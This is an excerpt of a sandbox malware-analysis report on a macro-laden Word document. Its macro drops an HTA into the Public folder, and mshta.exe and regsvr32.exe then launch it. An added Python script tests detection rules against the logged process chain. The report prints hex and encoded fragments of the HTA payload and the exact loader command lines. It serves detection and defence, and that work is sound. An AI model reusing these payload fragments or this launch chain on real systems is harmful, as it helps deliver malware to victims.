  Completion: success or wait  Count: 1  Address: 66B8977C  Symbol: unknown

Source File Path: C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
  Access: read attributes | synchronize | generic read | generic write
  Attributes: device
  Options: synchronous io non alert | non directory file
  Completion: success or wait  Count: 1  Address: 66AC3F8E  Symbol: unknown

Source File Path: C:\Users\user\Application Data\Microsoft\Forms
  Access: read data or list directory | synchronize
  Attributes: device
  Options: directory file | synchronous io non alert | open for backup ident | open reparse point
  Completion: success or wait  Count: 1  Address: 66ABE349  Symbol: unknown

Source File Path: C:\Users\user\Application Data\Microsoft\Forms\WINWORD.box
  Access: read attributes | synchronize | generic read | generic write
  Attributes: device
  Options: synchronous io non alert | non directory file
  Completion: success or wait  Count: 1  Address: 66ABE349  Symbol: unknown

Source File Path: C:\Users\user\AppData\Local\Temp\~DFE9922E621944E674.TMP
  Access: read attributes | synchronize | generic read | generic write
  Attributes: device
  Options: synchronous io non alert | non directory file
  Completion: success or wait  Count: 1  Address: 66ABE349  Symbol: unknown

Source File Path: C:\Users\user\AppData\Local\Temp\~DFC42290EF3C7FEBD3.TMP
  Access: read attributes | delete | synchronize | generic read | generic write
  Attributes: device
  Options: synchronous io non alert | non directory file | delete on close
  Completion: success or wait  Count: 1  Address: 66ABE349  Symbol: unknown

Source File Path: c:\users\public\valuePasteList.hta
  Access: read attributes | synchronize | generic write
  Attributes: device
  Options: synchronous io non alert | non directory file
  Completion: success or wait  Count: 1  Address: 66A91A7F  Symbol: unknown

Source File Path: C:\Users\user\AppData\Local\Temp\~DF6C485975BA5B87EC.TMP
  Access: read attributes | synchronize | generic read | generic write
  Attributes: device
  Options: synchronous io non alert | non directory file
  Completion: success or wait  Count: 1  Address: 66AB5805  Symbol: unknown

Source File Path: C:\Users\user\AppData\Local\Temp\~DFDF5D735246FB5985.TMP
  Access: read attributes | synchronize | generic read | generic write
  Attributes: device
  Options: synchronous io non alert | non directory file
  Completion: success or wait  Count: 1  Address: 66BF7D31  Symbol: unknown

File Deleted

Source File Path                                           Completion       Count  Address   Symbol
C:\Users\user\AppData\Roaming\Microsoft\Forms\WINWORD.box  success or wait  1      66ABE349  unknown
C:\Users\user\AppData\Local\Temp\~DF6C485975BA5B87EC.TMP   success or wait  1      66AB5805  unknown
C:\Users\user\Desktop\~$aabd25_by_Libranalysis.docm        success or wait  1      66AB5805  unknown
C:\Users\user\AppData\Local\Temp\~DFDF5D735246FB5985.TMP   success or wait  1      66B66A73  unknown
C:\Users\user\AppData\Local\Temp\~DFE9922E621944E674.TMP   success or wait  1      66B7232A  unknown

File Written


Copyright Joe Security LLC 2021 Page 40 of 49 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 17100 26 21 00 00 08 c8 00 &!...... success or wait 1 66AC3F8E unknown 00 00 00 00 00 00 00 ...... 00 00 03 00 00 00 00 ...... 00 00 00 00 00 00 00 ...... &!...... 00 00 00 00 00 00 00 ...... 0..... 00 00 00 00 00 00 00 ..,...... 00 00 18 00 00 00 00 ...... 00 00 00 14 00 00 00 ...... 00 00 00 00 ff ff ff ff 00 ....H...... D.. 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 04 00 00 00 03 00 03 80 00 00 00 00 00 00 00 00 ff ff ff ff 26 21 01 00 08 c8 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 04 00 00 00 03 00 03 80 00 00 00 00 00 00 00 00 ff ff ff ff a6 10 02 00 08 c8 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00 44 00 00 C:\Users\Public\valuePasteList.hta unknown 512 3c 68 74 6d 6c 3e 3c

69 76 20 69 64 3d 27 fTtlc29sYy50bmVtdWdyQ 63 6f 6e 74 65 6e 74 WVzYWJhdG 27 3e 66 54 74 6c 63 FEdHhlbjspMiAsImdwai50 32 39 73 59 79 35 30 c2lMZXRz 62 6d 56 74 64 57 64 YVBldWxhdlxcY2lsYnVwX 79 51 57 56 7a 59 57 FxzcmVzdV 4a 68 64 47 46 45 64 xcOmMiKGVsaWZvdGV2 48 68 6c 62 6a 73 70 YXMudG5lbXVn 4d 69 41 73 49 6d 64 ckFlc2FiYXRhRHR4ZW47 77 61 69 35 30 63 32 KXlkb2Jlc2 6c 4d 5a 58 52 7a 59 5vcHNlci5iVnlyZXVRcmFl 56 42 6c 64 57 78 68 bGMoZXRp 64 6c 78 63 59 32 6c cncudG5lbXVnckFlc2FiYX 73 59 6e 56 77 58 46 RhRHR4ZW 78 7a 63 6d 56 7a 64 47MSA9IGVweXQud 56 78 63 4f 6d 4d 69 4b 47 56 73 61 57 5a 76 64 47 56 32 59 58 4d 75 64 47 35 6c 62 58 56 6e 63 6b 46 6c 63 32 46 69 59 58 52 68 52 48 52 34 5a 57 34 37 4b 58 6c 6b 62 32 4a 6c 63 32 35 76 63 48 4e 6c 63 69 35 69 56 6e 6c 79 5a 58 56 52 63 6d 46 6c 62 47 4d 6f 5a 58 52 70 63 6e 63 75 64 47 35 6c 62 58 56 6e 63 6b 46 6c 63 32 46 69 59 58 52 68 52 48 52 34 5a 57 34 37 4d 53 41 39 49 47 56 77 65 58 51 75 64

File Read

Source File Path Offset Length Completion Count Address Symbol C:\Users\user\Desktop\25aabd25_by_Libranalysis.docm 3499 191 success or wait 2 66AB5805 unknown

Registry Activities

Key Created

Source Key Path | Completion | Count | Address | Symbol
HKEY_CURRENT_USER\Software\Microsoft\VBA | success or wait | 1 | 66AC8A84 | RegCreateKeyExA
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1 | success or wait | 1 | 66AC8A84 | RegCreateKeyExA
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | success or wait | 1 | 66AC8A84 | RegCreateKeyExA
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\1FF7A | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0 | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\Toolbars | success or wait | 1 | 66B24E8B | unknown
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\Toolbars\Settings | success or wait | 1 | 66B24E8B | unknown

Key Value Created

Source Key Path | Name | Type | Data | Completion | Count | Address | Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage | VBAFilesIntl_1033 | dword | 1386086401 | success or wait | 1 | 66B27FEE | unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import | Name | unicode | Recover Text from Any File | success or wait | 1 | 66AB5805 | unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import | Path | unicode | C:\Program Files (x86)\Common Files\Microsoft Shared\TextConv\RECOVR32.CNV | success or wait | 1 | 66AB5805 | unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import | Extensions | unicode | * | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose | Cambria Math | binary | 02 04 05 03 05 04 06 03 02 04 | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\1FF7A | 1FF7A | binary | 04 00 00 00 E4 17 00 00 2A 00 00 00 43 00 3A 00 5C 00 55 00 73 00 65 00 72 00 73 00 5C 00 68 00 61 00 72 00 64 00 7A 00 5C 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 5C 00 4C 00 6F 00 63 00 61 00 6C 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 69 00 6D 00 67 00 73 00 2E 00 68 00 74 00 6D 00 08 00 00 00 69 00 6D 00 67 00 73 00 2E 00 68 00 74 00 6D 00 00 00 00 00 01 00 00 00 00 00 00 00 97 4E 1D 10 1E 3E D7 01 7A FF 01 00 7A FF 01 00 00 00 00 00 DB 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 (the report continues with a run of several hundred 00 bytes that ends FF FF FF FF 00 00 00 00 00 00 00 00; the structure decodes as a length-prefixed UTF-16LE path of 0x2A = 42 characters, C:\Users\hardz\AppData\Local\Temp\imgs.htm, then the 8-character name imgs.htm, then the little-endian FILETIME 97 4E 1D 10 1E 3E D7 01 = 0x01D73E1E101D4E97, which is 2021-05-01 00:08:07 UTC and matches the 2021-04-30T17:08 local timestamp recorded under Reading Locations below if the sandbox clock runs seven hours behind UTC; note that the profile name in this path, hardz, differs from the sandbox account user under which the same file is recorded in the next row) | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0 | File Path | unicode | C:\Users\user\AppData\Local\Temp\imgs.htm | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0 | Datetime | unicode | 2021-04-30T17:08 | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0 | Position | unicode | 0 0 | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | MainWindow | unicode | 0 0 1280 984 1 | success or wait | 1 | 66B798E7 | RegSetValueExA
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | MdiMaximized | unicode | 0 | success or wait | 1 | 66B798E7 | RegSetValueExA
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | Dock | binary | 02 00 4C 01 05 00 08 00 04 00 1E 00 FC 03 FC 02 FF 02 01 01 04 00 1E 00 B8 00 FC 02 FF 02 00 01 04 00 1E 00 B8 00 2F 01 05 00 00 01 04 00 35 01 B8 00 FC 02 01 00 00 01 BE 00 1E 00 FC 03 FC 02 FF 02 00 01 BE 00 1E 00 FC 03 FC 02 FF 02 01 01 BE 00 1E 00 FC 03 FC 02 00 00 00 01 BB 03 5E 00 FC 03 FC 02 06 00 00 00 D3 00 AF 01 09 03 32 02 FF 03 01 00 D3 00 AF 01 09 03 32 02 04 00 00 00 93 01 AF 01 09 03 32 02 03 00 00 00 D3 00 AF 01 09 03 32 02 02 00 00 00 21 00 72 01 6C 02 12 02 FF 03 01 00 21 00 72 01 E8 00 12 02 04 00 00 00 EE 00 72 01 A9 01 12 02 03 00 00 00 AF 01 72 01 6C 02 12 02 02 00 00 00 F8 02 81 00 AC 03 01 01 05 00 00 00 59 00 30 02 0D 01 4B 03 01 00 00 00 3A 03 BC 00 79 03 1F 02 06 00 00 00 16 00 16 00 D9 01 C4 00 04 00 01 00 2C 00 2C 00 EB 01 E3 00 03 00 01 00 42 00 42 00 3B 02 F7 00 02 00 01 00 00 00 00 00 00 00 00 00 08 00 00 00 58 00 57 00 37 01 FF 01 01 00 01 00 00 00 00 00 00 00 00 00 06 00 01 00 6E 00 6E 00 7F 01 52 01 05 00 01 00 00 00 00 00 00 00 00 00 00 00 01 00 | success or wait | 1 | 66B24713 | RegSetValueExA
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | FolderView | unicode | 1 | success or wait | 1 | 66B798E7 | RegSetValueExA
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | Tool | binary | 00 00 00 00 07 00 00 00 47 65 6E 65 72 61 6C 00 FF FF FF FF FF FF FF FF | success or wait | 1 | 66B79A07 | RegSetValueExA
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | CtlsShowSelected | unicode | 0 | success or wait | 1 | 66B798E7 | RegSetValueExA
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | DsnShowSelected | unicode | 0 | success or wait | 1 | 66B798E7 | RegSetValueExA
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\Toolbars\Settings | Microsoft Visual Basic | binary | 01 01 00 00 00 00 00 00 00 00 01 00 00 00 | success or wait | 1 | 66B24E8B | unknown
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | UI | binary | 69 00 00 00 01 01 00 00 00 00 00 00 06 00 01 00 00 00 02 01 0B 00 00 80 00 00 08 01 00 01 00 00 14 00 08 4D 00 65 00 6E 00 75 00 20 00 42 00 61 00 72 00 01 01 01 00 00 00 FF FF 00 00 FD FF 32 00 32 00 58 02 5A 00 00 00 00 00 03 01 00 0A 32 75 00 00 08 00 03 01 00 00 00 00 01 80 00 00 03 01 00 0A 33 75 00 00 08 00 03 02 00 00 00 00 02 80 00 00 03 01 00 0A 34 75 00 00 08 00 03 03 00 00 00 00 03 80 00 00 03 01 00 0A 35 75 00 00 08 00 03 04 00 00 00 00 04 80 00 00 03 01 00 0A 36 75 00 00 08 00 03 05 00 00 00 00 05 80 00 00 03 01 00 0A D5 75 00 00 08 00 03 06 00 00 00 00 06 80 00 00 03 01 00 0A 3C 75 00 00 08 00 03 07 00 00 00 00 07 80 00 00 03 01 00 0A 37 75 00 00 08 00 03 08 00 00 00 00 08 80 00 00 03 01 00 0A 56 75 00 00 08 00 03 09 00 00 00 00 09 80 00 00 03 01 00 0A 39 75 00 00 08 00 03 0A 00 00 00 00 0A 80 00 00 03 01 00 0A 3A 75 00 00 08 00 03 0B 00 00 00 00 30 00 00 00 02 01 FF FF 2F 80 00 00 00 00 00 00 00 00 10 00 08 53 00 74 00 61 00 6E 00 64 00 61 00 72 00 64 00 01 01 01 01 00 00 FF FF 00 00 FD FF 32 00 6E 00 58 02 96 00 2F 00 00 00 02 01 FF FF 30 80 00 00 00 00 00 00 00 00 10 00 04 45 00 64 00 69 00 74 00 04 00 01 02 00 00 FF FF 00 00 FD FF 32 00 AA 00 58 02 D2 00 30 00 00 00 02 01 FF FF 31 80 00 00 00 00 00 00 00 00 10 00 05 44 00 65 00 62 00 75 00 67 00 04 00 01 03 00 00 FF FF 00 00 FD FF 32 00 E6 00 58 02 0E 01 31 00 00 00 02 01 FF FF 32 80 00 00 00 00 00 00 00 00 10 00 08 55 00 73 00 65 00 72 00 46 00 6F 00 72 00 6D 00 04 00 01 04 00 00 FF FF 00 00 FD FF 32 00 22 01 58 02 4A 01 32 00 00 00 02 01 FF FF DB 00 00 00 97 01 00 02 00 00 10 00 00 04 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 00 00 00 | success or wait | 1 | 66B24EF9 | RegSetValueExA

The VBA\7.1\Common values (MainWindow, Dock, Tool, UI and the Toolbars\Settings entry, whose UTF-16 strings read General, Menu Bar, Standard, Edit, Debug and UserForm) are VBE window-layout state written because the macro project was loaded; they are not persistence.

Key Value Modified

Source Key Path | Name | Type | Old Data | New Data | Completion | Count | Address | Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage | ProductFiles | dword | 1386086415 | 1386086416 | success or wait | 1 | 66AB5805 | unknown
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage | ProductFiles | dword | 1386086416 | 1386086417 | success or wait | 1 | 66AB5805 | unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import | Name | unicode | Recover Text from Any File | WordPerfect 5.x | success or wait | 1 | 66AB5805 | unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import | Path | unicode | C:\Program Files (x86)\Common Files\Microsoft Shared\TextConv\RECOVR32.CNV | C:\Program Files (x86)\Common Files\Microsoft Shared\TextConv\WPFT532.CNV | success or wait | 1 | 66AB5805 | unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import | Extensions | unicode | * | doc | success or wait | 1 | 66AB5805 | unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import | Name | unicode | WordPerfect 5.x | WordPerfect 6.x - 7.0 | success or wait | 1 | 66AB5805 | unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import | Path | unicode | C:\Program Files (x86)\Common Files\Microsoft Shared\TextConv\WPFT532.CNV | C:\Program Files (x86)\Common Files\Microsoft Shared\TextConv\WPFT632.CNV | success or wait | 1 | 66AB5805 | unknown
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import | Extensions | unicode | doc | wpd doc | success or wait | 1 | 66AB5805 | unknown
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\1FF7A | 1FF7A | binary | the value shown under Key Value Created above: 04 00 00 00 E4 17 00 00 2A 00 00 00, the UTF-16LE strings C:\Users\hardz\AppData\Local\Temp\imgs.htm and imgs.htm, then 00 00 00 00 01 00 00 00 00 00 00 00 97 4E 1D 10 1E 3E D7 01 7A FF 01 00 7A FF 01 00 00 00 00 00 DB 04 00 00 02 00 00 00 and the zero padding ending FF FF FF FF 00 00 00 00 00 00 00 00 | identical to the old data except that the eight bytes 97 4E 1D 10 1E 3E D7 01 (the FILETIME) are replaced by 00 00 00 00 00 00 00 00 | success or wait | 1 | 66AB5805 | unknown

The Text Converters\Import rows show one key being rewritten in sequence (Recover Text from Any File, then WordPerfect 5.x, then WordPerfect 6.x - 7.0, with the matching converter DLL path and extension list) from the same WINWORD.EXE code address, 66AB5805, that writes the document-recovery and reading-location values. That is Word enumerating its import converters while opening the document, not macro activity, and none of the registry changes in this section create persistence. The macro's observable effect is the HTA write under File Written.

Analysis Process: explorer.exe PID: 6048 Parent PID: 6116

General

Start time: 17:07:37 Start date: 30/04/2021 Path: C:\Windows\SysWOW64\explorer.exe Wow64 process (32bit): true Commandline: explorer c:\users\public\valuePasteList.hta Imagebase: 0x1320000 File size: 3611360 bytes MD5 hash: 166AB1B9462E5C1D6D18EC5EC0B6A5F7 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities

File Created

Source File Path: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Access: read data or list directory | synchronize
Attributes: device
Options: directory file | synchronous io non alert | open for backup ident | open reparse point
Completion: object name collision
Count: 1
Address: 145000F
Symbol: ILCreateFromPathW


Analysis Process: explorer.exe PID: 5316 Parent PID: 792

General

Start time: 17:07:38 Start date: 30/04/2021 Path: C:\Windows\explorer.exe Wow64 process (32bit): false Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding Imagebase: 0x7ff714890000 File size: 3933184 bytes MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Registry Activities


Analysis Process: mshta.exe PID: 4804 Parent PID: 5316

General

Start time: 17:07:39 Start date: 30/04/2021 Path: C:\Windows\SysWOW64\mshta.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\valuePasteList.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} Imagebase: 0x1270000 File size: 13312 bytes MD5 hash: 7083239CE743FDB68DFC933B7308E80A Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

File Activities


File Deleted

Source File Path Completion Count Address Symbol C:\Users\Public\valuePasteList.hta success or wait 1 7099A8A4 DeleteFileW


Registry Activities


Analysis Process: regsvr32.exe PID: 4864 Parent PID: 4804

General

Start time: 17:07:42 Start date: 30/04/2021 Path: C:\Windows\SysWOW64\regsvr32.exe Wow64 process (32bit): true Commandline: 'C:\Windows\System32\regsvr32.exe' c:\users\public\valuePasteList.jpg Imagebase: 0x990000 File size: 20992 bytes MD5 hash: 426E7499F6A7346F0410DEAD0805586B Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities

File Read

Source File Path Offset Length Completion Count Address Symbol C:\Users\Public\valuePasteList.jpg unknown 64 success or wait 1 991909 ReadFile
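Taken together, the Analysis Process sections give the launch chain: WINWORD.EXE (PID 6116) starts a 32-bit explorer.exe (PID 6048) with the dropped HTA as its only argument; the HTA is then opened by mshta.exe (PID 4804), whose parent is the 64-bit, COM-activated explorer.exe (PID 5316, parent 792, started with /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding), not Word; and mshta.exe in turn runs regsvr32.exe (PID 4864) on c:\users\public\valuePasteList.jpg. The trailing {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} pair on the mshta.exe command line is the argument form of the registered htafile open command, so the shell opened the file by its association. A detection keyed on an Office process being the direct parent of mshta.exe, or on an Office process appearing anywhere in mshta.exe's ancestry, therefore never fires on this sample. Note also that no process in this section writes valuePasteList.jpg; regsvr32.exe's only logged action is a 64-byte ReadFile on it, and 64 bytes is the size of a DOS header. The Python below is an added example, not part of the Joe Sandbox report: it encodes the report's process records as constructed input and evaluates five rules over them to show which ones catch this chain. The rule names, the OFFICE_APPS and SCRIPT_HOSTS sets and the empty record for PID 792 are choices made here; PID 792 is the parent of both WINWORD.EXE and the 64-bit explorer.exe but is not described in this excerpt, and WINWORD.EXE's image path and command line are not in it either, so those fields are left empty.

```python
import re

# Constructed input: the process records from this report's Analysis Process
# sections (PIDs, parent PIDs, image paths and command lines as printed there).
# PID 792 is not described in the excerpt and WINWORD.EXE's path and command
# line are not in it, so those fields are empty (assumption, not report data).
PROCESSES = [
    {"pid": 792, "ppid": None, "image": "", "cmd": ""},
    {"pid": 6116, "ppid": 792, "image": "WINWORD.EXE", "cmd": ""},
    {"pid": 6048, "ppid": 6116, "image": r"C:\Windows\SysWOW64\explorer.exe",
     "cmd": r"explorer c:\users\public\valuePasteList.hta"},
    {"pid": 5316, "ppid": 792, "image": r"C:\Windows\explorer.exe",
     "cmd": r"C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding"},
    {"pid": 4804, "ppid": 5316, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmd": r"'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\valuePasteList.hta' "
            r"{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}"},
    {"pid": 4864, "ppid": 4804, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmd": r"'C:\Windows\System32\regsvr32.exe' c:\users\public\valuePasteList.jpg"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe", "rundll32.exe"}
SCRIPT_FILE = re.compile(r"\.(?:hta|js|jse|vbs|vbe|wsf)\b", re.I)
PUBLIC_DIR = re.compile(r"c:\\users\\public\\", re.I)


def image_name(proc):
    """Lower-cased file name of the process image (empty for the unknown PID)."""
    return proc["image"].rsplit("\\", 1)[-1].lower()


def ancestors(table, pid):
    """Parent, grandparent, ... of pid, stopping at a missing or repeated PID."""
    seen = set()
    cur = table[pid]["ppid"]
    while cur in table and cur not in seen:
        seen.add(cur)
        yield table[cur]
        cur = table[cur]["ppid"]


def evaluate(procs):
    """Run five rules over the tree; returns {rule name: [matching PIDs]}."""
    table = {p["pid"]: p for p in procs}
    hits = {k: [] for k in ("office_direct_child", "office_ancestor",
                            "office_spawns_explorer_with_script",
                            "script_host_on_public_dir", "regsvr32_non_dll")}
    for p in procs:
        name = image_name(p)
        par = table.get(p["ppid"])
        par_name = image_name(par) if par else ""
        if name in SCRIPT_HOSTS:
            # Rule 1: script host whose direct parent is an Office process.
            if par_name in OFFICE_APPS:
                hits["office_direct_child"].append(p["pid"])
            # Rule 2: an Office process anywhere up the parent chain.
            if any(image_name(a) in OFFICE_APPS for a in ancestors(table, p["pid"])):
                hits["office_ancestor"].append(p["pid"])
            # Rule 4: script host handed a file under C:\Users\Public.
            if PUBLIC_DIR.search(p["cmd"]):
                hits["script_host_on_public_dir"].append(p["pid"])
        # Rule 3: Office process starts explorer.exe with a script file argument.
        if name == "explorer.exe" and par_name in OFFICE_APPS and SCRIPT_FILE.search(p["cmd"]):
            hits["office_spawns_explorer_with_script"].append(p["pid"])
        # Rule 5: regsvr32.exe whose module argument is not a .dll. Whitespace
        # splitting is enough here because no path in this report contains a
        # space; real telemetry needs a Windows command-line tokenizer.
        if name == "regsvr32.exe":
            args = [a for a in p["cmd"].split()[1:] if not a.startswith("/")]
            if args and not args[-1].lower().endswith(".dll"):
                hits["regsvr32_non_dll"].append(p["pid"])
    return hits


if __name__ == "__main__":
    for rule, pids in evaluate(PROCESSES).items():
        print(f"{rule:36s} {pids or 'no match'}")
```

Rules 1 and 2 return nothing on this tree because the explorer.exe that parents mshta.exe is the COM-activated instance under PID 792, not the one Word started. Rule 3 catches the hand-off at its source (PID 6048), and rules 4 and 5 catch the script host and the loader independently of parentage, which is what a rule set for this chain needs.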

Disassembly

Code Analysis
